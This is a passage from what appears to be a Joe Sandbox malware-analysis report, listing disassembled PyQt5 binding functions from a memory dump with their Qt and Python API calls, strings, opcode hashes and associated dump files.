Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
String ID: QTextImageFormat$height$height(self) -> float
API String ID: 2584946227-3151405701
Opcode ID: fd768665d0c17dcd5b57ec2c590b362a963c9154a024cd71df3dd570a7992f02
Instruction ID: 43039ab8a5aba251cf556a2c016550984c8b8335fcd695830d5cd0b58c204b59
Opcode Fuzzy Hash: fd768665d0c17dcd5b57ec2c590b362a963c9154a024cd71df3dd570a7992f02
Instruction Fuzzy Hash: B6011AB5A08E46C1EB109F61E8486A937A8FB94B55F9140B2CE4C03320DF7DD65AC780

Function 00007FFB9A34D950 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isDropEnabled@QStandardItem@@QEBA_NXZ.QT5GUI ref: 00007FFB9A34D99B
PyBool_FromLong.PYTHON3 ref: 00007FFB9A34D9A4

Strings

QStandardItem, xrefs: 00007FFB9A34D9C9
isDropEnabled, xrefs: 00007FFB9A34D9C2
isDropEnabled(self) -> bool, xrefs: 00007FFB9A34D9B6

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_DropEnabled@FromItem@@LongStandard
String ID: QStandardItem$isDropEnabled$isDropEnabled(self) -> bool
API String ID: 1493504921-1892244150
Opcode ID: c2a7de62048a6f8fb32650f50791a700e1d27296324a58bac757c60e9ba90b0e
Instruction ID: dd92b0ce6e5cb5d1f7a12ed638c004a58012f5ea917e1c6bfe2aed16adee260e
Opcode Fuzzy Hash: c2a7de62048a6f8fb32650f50791a700e1d27296324a58bac757c60e9ba90b0e
Instruction Fuzzy Hash: 370128B5B08A47C1EB109F71E8986A833A8FB94B85FA140B6CA5C43320CF7DD959C380

Function 00007FFB9A2FFEB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?devicePixelRatio@QWindow@@QEBANXZ.QT5GUI ref: 00007FFB9A2FFEFB
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A2FFF01

Strings

devicePixelRatio(self) -> float, xrefs: 00007FFB9A2FFF13
QWindow, xrefs: 00007FFB9A2FFF26
devicePixelRatio, xrefs: 00007FFB9A2FFF1F

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?deviceDoubleFloat_FromPixelRatio@Window@@
String ID: QWindow$devicePixelRatio$devicePixelRatio(self) -> float
API String ID: 3287233405-1767006637
Opcode ID: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
Instruction ID: c6f3c6404c84d9c5343ab63094a944a44e78ce020f7f1af2f90ce8f45a81461b
Opcode Fuzzy Hash: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
Instruction Fuzzy Hash: E001ECB5A08A46C1EB50DF65E8486A937A8FB95B45FA140B2CA5D43330CF7DD98AC740

Function 00007FFB9A32DAB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?leading@QRawFont@@QEBANXZ.QT5GUI ref: 00007FFB9A32DAFB
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A32DB01

Strings

QRawFont, xrefs: 00007FFB9A32DB26
leading(self) -> float, xrefs: 00007FFB9A32DB13
leading, xrefs: 00007FFB9A32DB1F

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?leading@DoubleFloat_Font@@From
String ID: QRawFont$leading$leading(self) -> float
API String ID: 617535915-3077518540
Opcode ID: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
Instruction ID: 2958f877cc5d7e0459aa697fb975d289b05cf13e9cbcb8d2af55058b7c2ff3d8
Opcode Fuzzy Hash: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
Instruction Fuzzy Hash: 7E01ECB5A08B46C1EB10DF75E8586A937A8FB94745F9140B2CA5D43320CF7DD949C740

Function 00007FFB9A339B70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?miterLimit@QPainterPathStroker@@QEBANXZ.QT5GUI ref: 00007FFB9A339BBB
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A339BC1

Strings

QPainterPathStroker, xrefs: 00007FFB9A339BE6
miterLimit, xrefs: 00007FFB9A339BDF
miterLimit(self) -> float, xrefs: 00007FFB9A339BD3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?miterDoubleFloat_FromLimit@PainterPathStroker@@
String ID: QPainterPathStroker$miterLimit$miterLimit(self) -> float
API String ID: 1108256340-4006628480
Opcode ID: 92db6312f7f2d039ee461fa54fa794bae75f566db4c078a00d5bb3851c6744a7
Instruction ID: 444279a7a6a038dce10bdf9d537f528c3672ec6b5cca550a6b03a4a33810127c
Opcode Fuzzy Hash: 92db6312f7f2d039ee461fa54fa794bae75f566db4c078a00d5bb3851c6744a7
Instruction Fuzzy Hash: 6301ECB5A08A46C1EB20DF75E8486A937A8FB54B44FA140B6CA5D43320DF7DD55AC780

Function 00007FFB9A2E5BC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?leading@QTextLine@@QEBANXZ.QT5GUI ref: 00007FFB9A2E5C0B
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A2E5C11

Strings

leading(self) -> float, xrefs: 00007FFB9A2E5C23
QTextLine, xrefs: 00007FFB9A2E5C36
leading, xrefs: 00007FFB9A2E5C2F

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?leading@DoubleFloat_FromLine@@Text
String ID: QTextLine$leading$leading(self) -> float
API String ID: 619423061-3212982793
Opcode ID: b98cf2cc52f751869b42174ee9b697911b12cc89bdde306263e33069777b055e
Instruction ID: 4af79692e600a68ae5eeae8a7dafb17e81192b5e651e442da449d5ac454aa66a
Opcode Fuzzy Hash: b98cf2cc52f751869b42174ee9b697911b12cc89bdde306263e33069777b055e
Instruction Fuzzy Hash: 1D01ECB5A08A56C1EB10DF65E8986A933B8FB54795F9140B2CA5D47320CF7DD58AC340

Function 00007FFB9A2E1990 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?height@QTextLine@@QEBANXZ.QT5GUI ref: 00007FFB9A2E19DB
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A2E19E1

Strings

height, xrefs: 00007FFB9A2E19FF
height(self) -> float, xrefs: 00007FFB9A2E19F3
QTextLine, xrefs: 00007FFB9A2E1A06

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?height@DoubleFloat_FromLine@@Text
String ID: QTextLine$height$height(self) -> float
API String ID: 541853136-3096497767
Opcode ID: 14d68237d2863db5ea7894f5591de8b88868eda07a9c98c80cb6289de3b89335
Instruction ID: 42141e174e07a45ae66b73cec1743781775fe47d12cfda4b829e2b7de23904d3
Opcode Fuzzy Hash: 14d68237d2863db5ea7894f5591de8b88868eda07a9c98c80cb6289de3b89335
Instruction Fuzzy Hash: C101ECB5A08A46C1EB10DF65E8886A933A8FB55B45F9140B2CA5D47320CF7DE94AC340

Function 00007FFB9A30FA00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?widthF@QPen@@QEBANXZ.QT5GUI ref: 00007FFB9A30FA4B
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A30FA51

Strings

widthF(self) -> float, xrefs: 00007FFB9A30FA63
QPen, xrefs: 00007FFB9A30FA76
widthF, xrefs: 00007FFB9A30FA6F

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?widthDoubleFloat_FromPen@@
String ID: QPen$widthF$widthF(self) -> float
API String ID: 64521866-462915029
Opcode ID: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
Instruction ID: 06b9f897311b95e37a09d43ac75d750667485dec586e7c11cd3ab6ff79fa2c66
Opcode Fuzzy Hash: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
Instruction Fuzzy Hash: 24012CB5A08B46C1EB10CF71E8886A833B8FB41B44F9140B6CA5C43320DF7DD94AC740

Function 00007FFB9A2F3C20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

?cacheLimit@QPixmapCache@@SAHXZ.QT5GUI ref: 00007FFB9A2F3C4A
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2F3C52

Strings

QPixmapCache, xrefs: 00007FFB9A2F3C77
cacheLimit, xrefs: 00007FFB9A2F3C70
cacheLimit() -> int, xrefs: 00007FFB9A2F3C64

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?cacheCache@@FromLimit@LongLong_Pixmap
String ID: QPixmapCache$cacheLimit$cacheLimit() -> int
API String ID: 983417776-2926451805
Opcode ID: 4dd0b305608f62b61bb1aaef81ed363a77abfd05ee7624c5d54747995661f2c3
Instruction ID: 459acb8c3b4f7d9dcbdad4eb0df1707d54fb61c1d8ee3479b9e119857b5adcd9
Opcode Fuzzy Hash: 4dd0b305608f62b61bb1aaef81ed363a77abfd05ee7624c5d54747995661f2c3
Instruction Fuzzy Hash: AAF01DA5B08A47C2EB649B71E8483A83368FB96709FA040B2C50D52320CE3CD54AD300

Function 00007FFB9A36FAB0 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

PyList_Size.PYTHON3 ref: 00007FFB9A36FAD9
PyList_Size.PYTHON3 ref: 00007FFB9A36FB06
PyList_GetItem.PYTHON3 ref: 00007FFB9A36FB17
PyLong_AsLong.PYTHON3 ref: 00007FFB9A36FB20
PyList_Size.PYTHON3 ref: 00007FFB9A36FB2F

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: List_$Size$ItemLongLong_
String ID:
API String ID: 1144519416-0
